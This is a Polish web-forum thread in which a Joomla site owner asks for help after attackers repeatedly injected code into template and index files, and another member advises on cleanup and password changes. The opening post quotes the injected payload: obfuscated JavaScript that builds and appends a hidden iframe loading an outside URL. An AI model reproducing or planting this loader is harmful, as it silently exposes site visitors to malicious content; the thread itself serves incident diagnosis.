PDA

Zobacz pełną wersję : Inny złośliwy kod dopisany do stony



cezarc
20-03-2008, 00:08
Witam. Mój serwis został zaatakowany i dopisano mi złośliwy kod do pliku 404.php w katalogu template. Nie spotkałem się jeszcze z takim kodem na forum, więc postanowiłem założyć nowy temat.
Dopisany kod wygląda następująco:
{
?><html><body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh= 't';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab= 'src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf ,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us ,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('widt h','0');oE.setAttribute('height','0');oE.setAttrib ute('style','display:none');oE.setAttribute(ab,xx) ;document.body.appendChild(oE);
"></body></html><??>

Po tym zdarzeniu przywróciłem stronę z kopii i pozostawiłem. Na następny dzień znowu dopisano ten sam kod ale tym razem do pliku index.php w katalogu głównym.

Mam joomla 1.0.13 PL ze strony centrum, poza standardowymi dodatkami mam jeszcze: com_expose, com_swmenufree4[1].6, pack_artbannersplus_1[1].5.1-pl-iso, mod_flashmod_v2.0, mod_vcnt_ohne_c, bot_plugin_jw_allvideos_2[1].4-pl, bot_multithumb20b1_3_pl.
Wszystkie zmienne PHP ustawione są tak jak sobie tego życzy joomla.
Bardzo dziwne jest to, że zarówno plik 404.php jak i index.php miały chmody na 444. Zatem czy nadpisanie mogło nastąpić przez dziurę w jakimś dodatku? Ja myślę, że nie i atak następuje przez ftp (ktoś, lub coś wyśledził hasło).
Proszę o pomoc i wskazówki, jak naprawić skutecznie stronę i czy moje przypuszczenie jest słószne.
Dodatkowo interesuje mnie czy wirus może być zagnieżdżony w bazie danych, jeśli tak to jak go wyśledzić i usunąć.
Mam też log ze statystyk (500 ostatnich wejść na stronę kiedy w międzyczasie nastąpił atak)

Pozdrawiam i dziękuję za wszelką pomoc.

inkos
25-03-2008, 01:18
Zatem czy nadpisanie mogło nastąpić przez dziurę w jakimś dodatku? Ja myślę, że nie i atak następuje przez ftp (ktoś, lub coś wyśledził hasło).
Proszę o pomoc i wskazówki, jak naprawić skutecznie stronę i czy moje przypuszczenie jest słószne.
Dodatkowo interesuje mnie czy wirus może być zagnieżdżony w bazie danych, jeśli tak to jak go wyśledzić i usunąć.
Mam też log ze statystyk (500 ostatnich wejść na stronę kiedy w międzyczasie nastąpił atak)
Od końca. Jak masz logi to co w tych logach jest zapisane? Czy je analizowałeś czy nie? To jest podstawowa informacja do dalszych poszukiwań najsłabszego ogniwa.
Czy na pewno masz czystego kompa? Sprawdzałeś go jakimś oprogramowaniem?
Czy kontaktowałes sie z administratorem swojego serwera z pytaniem czy moglby sprawdzic czy wszystko jest ok?

To tak na poczatek.

cezarc
25-03-2008, 01:51
Na początek to dzięki za odpowiedź.
Nie mam logów z serwera, nie pytałem dostawcy, ale jeszcze zapytam (chwilowo jest to nie możliwe).
Tak sprawdziłem kompa syfu było pełno w tym trojany, to mój błąd bo to było na innej partycji niż systemowa, a przy przeinstalowaniu nie wziąłem tego pod uwagę.
Przeinstalowałem kompa (formatując wszystko). Na serwerze zmieniłem hasła FTP, do bazy. Zainstalowałem joomla 1.0.15 (do tej pory stało pod 1.0.13), wczytałem starą bazę i zmieniłem hasło do panelu admina. Na koniec dorzuciłem pliki z dodatkami, których nie ma w standardowej paczce no i moje pliki graficzne i inne.
Strona działa od trzech dni i jak na razie żaden plik nie został podmieniony (wcześniej zmiana następowała dosyć szybko). To dopisanie plików z niestandardowymi komponentami wydaje mi się ryzykowne bo jak podrzucono mi jakiś syf to jego też skopiowałem na serwer. Ale wcześniej skanowałem kilka razy i nic nie wykryło. Zatem mam pytanie:
Czy jeśli coś by było w tych plikach co ułatwia włam na stronę to czy zaktualizowany antywirus (avast) powinien to wykryć?
No i ponawiam pytanie czy wirus może siedzieć w bazie danych a jeśli tak to jak go wywalić?

inkos
25-03-2008, 02:12
Na początek to dzięki za odpowiedź.
Nie mam logów z serwera, nie pytałem dostawcy, ale jeszcze zapytam (chwilowo jest to nie możliwe).
Tak sprawdziłem kompa syfu było pełno w tym trojany, to mój błąd bo to było na innej partycji niż systemowa, a przy przeinstalowaniu nie wziąłem tego pod uwagę.
Przeinstalowałem kompa (formatując wszystko). Na serwerze zmieniłem hasła FTP, do bazy. Zainstalowałem joomla 1.0.15 (do tej pory stało pod 1.0.13), wczytałem starą bazę i zmieniłem hasło do panelu admina. Na koniec dorzuciłem pliki z dodatkami, których nie ma w standardowej paczce no i moje pliki graficzne i inne.
Strona działa od trzech dni i jak na razie żaden plik nie został podmieniony (wcześniej zmiana następowała dosyć szybko). To dopisanie plików z niestandardowymi komponentami wydaje mi się ryzykowne bo jak podrzucono mi jakiś syf to jego też skopiowałem na serwer. Ale wcześniej skanowałem kilka razy i nic nie wykryło. Zatem mam pytanie:
Czy jeśli coś by było w tych plikach co ułatwia włam na stronę to czy zaktualizowany antywirus (avast) powinien to wykryć?
No i ponawiam pytanie czy wirus może siedzieć w bazie danych a jeśli tak to jak go wywalić?
Jeśli miałeś taki syf u siebie na kompie to nie masz sie czemu dziwic. Moim zdaniem (bez analizy logów) wlam nastąpił za pomocą podsłuchanego hasła które wykradł ci któryś z trojanów itp. W loga bedzie to wygladalo prawie "normalnie".

Zmiana haseł do wszystkiego to dobry krok. Najwaniejsze sa hasla do kont ftp, paneli www i dalej poczty banku i innych jakie masz u siebie. Musisz zmienic wszystko gdyz nie masz pewnosci co jest juz gdzies w swiecie a co nie zostalo wykradzione.

Co do dodatkow ktore uzywasz - wartaloby abys poszukal info w sieci czy te wersje ktore uzywasz nie maja jakis znanych luk w bezpiecznestwie. Poszukaj na forum.joomla.org oraz takze w sieci - google tutaj jest twoim sprzymierzeńcem :)

Pliki przeskanuj kilkoma roznymi antywirusami - np. skanerami online lub za pomoca wersji testowych jeszcze np. kasperskiego itp. Najlepiej jak to beda z 2-4 rozne antywirusy.

Co do pytania czy antywirus moze to wykryc to nie zawsze - czesc to pliki php wykonywalne w odpowiednim srodowisku i tam dopiero ten zlosliwy kod jest aktywny.
Co do bazy danych to sam nie bede sie wypowiadal. Owszem istnieje ryzyko iz mozesz miec jakiegos nieproszonego "goscia" choc z moich doswiadczen wiem iz raczej te ataki skierowane sa na pliki na ftp aby dalej rozprzestrzeniac ten syf a bazy danych pozostaja nieruszone. Ale tak nie musi byc w Twoim przypadku.

A na przyszlosc - bardziej uwazaj aby twoj komp nie zlapal wiecej takiego swinstwa.

cezarc
25-03-2008, 23:56
A na przyszlosc - bardziej uwazaj aby twoj komp nie zlapal wiecej takiego swinstwa.

To fakt, dzięki.